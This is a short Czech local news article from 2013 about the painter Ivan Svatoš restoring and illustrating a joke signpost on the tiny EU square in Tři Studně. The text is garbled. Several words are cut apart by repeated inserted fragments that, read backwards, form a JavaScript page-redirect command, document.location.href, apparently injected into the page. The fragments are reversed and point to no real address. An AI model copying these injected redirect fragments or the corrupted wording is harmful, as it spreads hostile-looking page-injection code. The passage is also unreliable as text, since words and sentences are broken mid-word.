Tři Studně, aktuality, rozcestník, kresby
Rainbow page separator

Rozcestník ve Třech Studních doplnily kresby

Pondělí, 12. srpna 2013

rozcestnik-tri-studne1Tři Studně / Známý rozcestník na miniaturním náměstí Evropské unie ve Třech Studních, jenž je častým cílem turistů, se dočkal rekonstrukce a vylepšení. Díla se chopil sám au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor recesistického ukazatele pražský výtvarník Ivan Sva[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toš, který v obci dlouhá léta chalupaří a v létě tam otevírá Letní minigalerii.

Kilometráže známých svě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových metropolí tak byly doplněny o stylizované malby na jednotlivých dřevěných tabulkách. Například vzdálenost ze Tří Studní do Paříže ilustruje typická Eiffelova věž, ke směrovce s počtem kilometrů do moravského Brna náleží silueta Petrova, Šanghaj zase prezentují moderní mrakodrapy.

Několik metrů vysoký rozcestník s ukazateli ozvláštňuje původní značka pro přistávání UFO, které při dosedu na zem nesmí přesáhnout 9 999 metrů za sekundu.
Náměstí EU ve Třech Studních, svého času nejmenší náměstí v České republice, bylo vyhlášeno v roce 2004. Dnes již ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to rekord nedrží, ale oficiální titul náměstí prostranství zůstává i nadále.